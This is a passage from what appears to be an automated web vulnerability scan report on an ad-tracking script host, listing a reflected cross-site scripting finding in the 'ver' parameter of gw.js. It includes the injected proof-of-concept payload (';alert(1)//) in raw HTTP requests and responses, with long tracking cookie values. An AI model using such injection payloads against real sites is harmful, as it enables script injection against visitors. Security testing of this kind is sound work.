rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="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"; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rtc_k8KG=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; rsi_segs_1000000=pUP94zmhOXMMH/C1v6FY5BD9CU6duy7ESpLgzGDKYyViGwmWW18bAQsYoAM+8HjFdJtFJWRCiLHBLDbWsPcI86yrtpktmfFacilUsrkfIWWKJiDdQnsDK82st/RBdHlSiCArToI74iBMHEIM6aRZ+ctyPyV2AcskZoa93bnD+7KzmMsYNaQWBrrYkNUezvQnLXGkhVG05Odz4K2YkQ7efGHGdJsOKQEkcQBYjtqaS6H7ZlDNGWHeUbBT+7iWjqkltSlqdFkY5ZCSD/LpMe6oE2LhWxsHk9CQb4f/4DBRvVR+Vsn3Wa2otHHl9DcyWQkxt+HNZk80xAqzN7umu7qJn1io7bu4IlqZWRAwUL/2riYdQyqUN2xVKYYypoVq1rD+CHWBoax0NCsrkHXbllfg48mnErvVtscNhDauRsHqShGST1ntuJP8Y2uTzuL21JyFn9D8BzYJI7XWgqgHY3hwgF1X4Spu79NlxqFyDqacIxYDmgj/c/80HbjalDyO2MjzVEQUdlANyAYn0j8EbYmxQKxsM6Rx3taFnmBYEmerFK8BfqeoKPoaXWO+nwv0ryXCZUva1SDjlo2wVhjQ76dAQ1KhNRC+7n6erq2kuZ1UHS7gGJ+a8IPLnbMauEqtWz/vfr9PAbndBB364psLhQxsNBZ/V+G5/rjrxQ6XCrYppz+AmSwLTlzgnXYOZE+rGQrANefuO3zqAEj7Orx7bW+c7SVq/vKvEfxbwhQK4Bb0D6+TT7bmiEPzBBOMjJtdSmdMA/UlA/1ADQ==; udm_0=MLv3NyEJZjpr3xSpL/sKOUxICxpURCNKVG8JBfsMOWr4c1ruOor8IW57ubLruJ70uAvWzxrBuHPGjOV0Yl999w9PWZEwp6XsRgcj+GkbCgPiYv9OYis//qNYlXaQsRkv1/9n8rbpls3/lg3b/9yLcovhjH8xhVus+bOGmVMfi7o7gawXwNvz26uIS28JGVLlC25P0hSiX8y1K25Ud7EXnL8DDb8pkUWpjvKZpMzKbPpZV94WqnSr172thZ8syzScr9cZG9oqnzD7bqSMJL5BQKcgxSuou8ECw+GXnkdl4OmbY2FbSYlCDRgc+/c6lhFH7jE0YNiubrzPt27J/JEc0Gs+XkI+Ebd1WvYw9/Xd7ftCSDR0Zwe8AhR6iKptca2vjFNTTKo+OkkLJW2FIsLYkAONGVJ9hOmW5e084U7uw0vM+Lhdzw9TqVu5ygVCjUYWXFmCqrrrRk62v1d6cSVtIHFIJ4lePrRIuyqlN2ALWcWNJ2nVPNQCtG6Dh8DEERFi+XoP1wPFhC0GiF7wn0MHND/wCWXx/JWKUU+VC34cUxuUta3r3XuTvx4d+vBQXuDPDnw29QIFptXZW6fOOuymtApEj21aZsv0egu11Apu04LD/roZjbpAC6QGunZcYL9ssZpQjWQYMBZlGqIfgh3iuuWUsPHTBGUDt5cscdNfS7TKpmHXmthcbc/d7e+/MnAdrT/1ZehbDdCHZQeWj6mIfzSpZ8cC3Zk24ZglqRgwNFbilMuOn3DcO2ugB4zdEQcmVaaz6YHh+JNmmLMjl2TA24PK3xD+fbpmhzFvEBjIi7clvv9qOiJtouwDDd2RQYT2Ep3F/HnCv/GaCR4wdJNb6Izjx2OU4EC6SMnmhzRJZx1Mvbeyktq11Zi2w55ZWgZls7Q7wzCg65f8+2GBHdPcBi0xQFO8j756qtOn/3dAStKIMF35glzGEz2NyJbHKXBtkH2X19gpB6ax9rOyGogvW99/utdnqqUGrzn/kEpQnDa2kEUk811wVSbL6q60O/bbCiUNeKz3rRkQPFP8+aD6V0zGLjDPKncsy1hNjN1jRpSMXKxDqVRdpcYwttiPkWREhaInub+YWVtT1oXubfLiNHV9UJeD2k0fkb7r3mvCCEYCbYbJQQbyzKSxCaY/3lu5/BahDewpho2bntF1PV9ZAIHz13i3/QIFqKunfGZergISuHHcpD6S5AkX5oSnOVAymhcRYncJuDVR7w3F5RLVa7EHGecTDqlEvm59ZX8cTQ5bzJ1Abtx13XYb7j1u7zVIfeXneYS+0GlZAi3yogjdpiPiBw1EH7P9o/q1Zg7W9IkgH/YVzge06UUUK4rT1AoMaf8i7WK1YW21srH7XQ0Ot8fltujTte/8QbNhYbI7IG0rOSBbSov47vv3n6MjpPrAf5qhMAXLUGatxFcl4tsfOkACgIvhTn8I6rAXvEYYlNAxsCfXmnI0p8hQiJERchlgDMgmxns4Ly+e/p6PMLWHzPtN5c+q+g+IPQG377uaac8DJzK02AriShlM9dZKDYxgqlG+zJ24k7ffFdBB4+ibuSXB8ld6ZqZ1O9+R2LgBbwAuSwdkT4ftgIBysXBOapY6pYD+cT84SMwsgTEMDgtYrO7hiyO4Q+hxJwlkbjJNzvJXX1Y8JfAsyg8ZWg53ml7FrAz2kysF0CgU8P9ILnou5Ckc6kCRS2UU0ZoeR188Jg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3tvXt87ROeRNpBzs63EnKfX2HpsMm2YUYjgEqjvfc+GnmxOUGUhVFxST7v4EbgX9QTRhUPRts5fz5olxbKmmdQyl8FAjgCJ9BkYHf6k5gqBI6z1bIAmgFQXX88DKIMATvgWrmYCuFq8DvU62WGy+J0RcKV+7KLdc2Kss4QNPi+caKUK8opkoifwTWbaJ2COquK5auTr6z1WtVKtZk25ptnIY2owSKFkTCt+tgox6yb8H4Qmw+r/fDIxBuq61h/qWx+3MJKbV+cLHyAboL1Gi15Pu2RcNZRylC2G03sgYYaFkOn+lud06KQW6QEDsZTtl2P9ajd+KZOf4kxeFKuxKRJv/JHJY7j3keJ6d19frL14byag6euLSAJ8hdFwAG2/9K1DyCO5XJNu9tctA3XBULG7migOOwQE2hHovI3/2OgMoyd0SIk2spRNGFv1tZo6fhrtqdYkZT/37ZWV8cm3otJlthLHmyEONPSFETtDEs2PtLsQBR3utoiwbpL/V/w2V/rvJqp5uCaxjtSNXsYo2oQdtEeiq/ReQkp3qraVAuUmAiovwXauUSGIHop1+5oWTskG1mMfVp+1IJHdgZqMGJagCb2P/2I4ZfHoQEznPGk9akVwxYP1sL9qaWQYup2b4atLgscgXj4gzCqxk05MSAtV5gFDuqFpx3LFmtaZajisK4odz3AvCuven/P24oPu6UFzz7j1fGb5VEqQCPOiBrXD7U7M4SIHP5HmCXJ+6y9KTQOx83SEeG1qbRk6OANFDjx3XiPlRjdKw+48UzQrKD/CTkFsXFt4zWCloJx1hP1DfyW5YZQ+GPfTzGVXXjjh12LPZygFnM+wE/wGfczrUwtxqSH3Vqa3xbfK1sRkJqxPVXhEVxE9ZP8TNwr8SXbF1V48iLWSIt5nNF6kUffoZ/QFThKzIusa1kIoaGqHY1F2Jgub5tPNpfAiqPXw9Q/K/cUGMojBK4QXGME41IIGvf0XBsa2TdbsK0EZsFWCvy6WqsKIulu1abHYEdy+9gfsr/oE9Gj8GOzMJH6M83WB5FNol7+Ws0MoJDIotcWwaPwsM21BA6oLPT8x5U/AdeLuONgVZt8hrYyYZL/I0DzBMFZ/qSoYJEwWvLy2MnDCfpQHlvdIoGjNBhTvwSpcyWa5TVaIgLIsY7cHayV0lKtMzfxhqv5s9ZTzN2D4HtGW2jDrmZ+l6rheCeAOoNln6j4HEM/h6B6MPvs/3H9r5jNZaW/qV3+brsalcGmJouMUGOExe/aZl8ND5XVUEDYURPKAH8gSUOnQqETIllS3hzoQ8lNQI7x8PhG1nuL6a1ZFX2TxZwelg9UTdJw832di1ld+Dyo/z5qyNKosCsR6zZwSSXWsNYEV0JQJT/m/qHeuttmkj60cpdbuHMDeNWxP4s6FmSF+MPDeb/+E9jETEbok+EER9vQLMz8PZUOul3t/P/J3gtrHh2cft7IpasUH5Os34TKQV7CJS/RoT3+riUxfT6qPENAARulRjExLiAizsk7bKE7MLYOLK33ZOTG0uUy0k81r7K9dIqgUW1fdqVaf0NeYC7rBMQW5fo4pabmJLT8s5pA+vPchQfRUASk8ffDVazwtjRYzRDGocgEqkAzC7rGSqhLWyFUf9+OdOLIBYQFO+EI/J3h3Z9XozqIHmlEvC5VblaC3PUnX1IVIeY70x6qY0UnAsRyYr9wyquWX2d5DwK99aOSJocXTQ0SuIFS4lKfhid8AneQXwP2g1OeckjuTiwMB6So+OvAIxY0QSJPqV4QyBH0laSBpBcM7yI4+kRXATyr4iK8or+IdX6cjQB1OwTL1sPzVRdFffqf8ALJuFnpjTHpEEM8xo6jASt4df+7eF0A==; Domain=.revsci.net; Expires=Wed, 27-Jun-2012 03:00:59 GMT; Path=/
Last-Modified: Tue, 28 Jun 2011 03:00:59 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 28 Jun 2011 04:00:59 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 03:00:59 GMT
Content-Length: 6236

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
2');
A10868.DM_addEncToLoc('clen','432');
A10868.DM_addEncToLoc('vid', '6127792');
A10868.DM_addEncToLoc('pid', '456378');
A10868.DM_addEncToLoc('pli', '2120305');
A10868.DM_addEncToLoc('sid', '18878351e237';alert(1)//45284dc1750');
A10868.DM_addEncToLoc('ali', '3130307');
A10868.DM_addEncToLoc('cid', '9518378');
A10868.DM_addEncToLoc('p', '275');
A10868.DM_addEncToLoc('ref', 'http://d.tradex.openx.com/afr.php?refresh=40&zon
...[SNIP]...

1.314. http://js.revsci.net/gateway/gw.js [ver parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the ver request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88741'%3balert(1)//23a21b5eb52 was submitted in the ver parameter. This input was echoed as 88741';alert(1)//23a21b5eb52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.288741'%3balert(1)//23a21b5eb52&clen=432&vid=6127792&pid=456378&pli=2120305&sid=1887835&ali=3130307&cid=9518378&p=275&ref=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Di& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="pUMV4imj8AcUrmz9liw1aYw2dfGs5o1KAlJo9K0QCDj4fNEUgv6Osz0QwizypDUDUf2xk+ZaltbSV3CZr0FJCVOcSXPSBSrR8TY9XEPiQQkLiIgJsUdU1J8b+cmUO1u/e5w0aSvpozFtsZG97DTlWgkDT3hUeS+9KzfLpTHg4msr1VZXs1fzBUwkZh0/77iC9ZthYjW9RGWrOt2zvTRXyM5qSkSpLBCtQQQBK9Ienb2qAvlBSFmj9tQiR9OzbvRD1u296rd6wTgDJ3HdJfQ9FKdoXC0mBa3Oyz2LuLvhSS9WCiFuiLycK3DnWk0nOR9MqUj8Q3CP1f+UyFanTCJ75jvEnT41YGHRa0zmvDbA2EajyIQ1IH4RTypyKgAked86yi7GcvSawGtsu5zWF0CMRn7me+fyex8bQapD6bcYKTLBNJZIYOe5XtAXndyjVLA5nkGWixGYi/hG+GZUTKYiWMXb/EAPE9m/JUc1Myot4m7i59QSQoX0NJ5NSPpOe9nhCz7RUUezgnHPCVScsVDHN0K0eQtEkFovScTquaLvL64njs+Kp7BUx1Y+9ljzFfkauwQIfSnlIAD5i50tKTLduy1Lbmcds2xEkMIoFPyAvDSEr3kmHs6B9HA03owtmn5PRVpmS3GDAmZVDx1Br+3Mwc2VQmwrn8Xj8lARZLU